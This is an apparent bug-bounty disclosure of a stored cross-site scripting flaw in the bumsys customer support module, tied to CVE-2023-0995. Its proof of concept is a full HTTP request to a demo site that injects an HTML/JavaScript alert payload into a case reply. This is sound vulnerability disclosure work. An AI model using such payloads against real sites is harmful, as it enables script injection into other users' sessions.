Lucene search
Hatlesswizard2847B92B-22C2-4DBC-A9D9-56A7CD12FE5FHistoryFeb 22, 2023 - 6:51 a.m.
Stored XSS in Customer Support
2023-02-2206:51:55
hatlesswizard
www.huntr.dev
9
xss
customer support
html injection
security vulnerability
0.001 Low
EPSS
Percentile
23.5%
Description
Attacker can send xss payload in Customer Support
Proof of Concept
Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"
<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"
Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"
2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"
Refund Request
-----------------------------3828905606458425251363531674--
Response:
HTML Injection and XSS alert
Related
cve
cve
CVE-2023-0995
2023-02-24 03:15:11
osv
osv
CVE-2023-0995
2023-02-24 03:15:11
cvelist
cvelist
CVE-2023-0995 Cross-site Scripting (XSS) - Stored in unilogies/bumsys
2023-02-24 00:00:00
prion
prion
Cross site scripting
2023-02-24 03:15:00
nvd
nvd
CVE-2023-0995
2023-02-24 03:15:11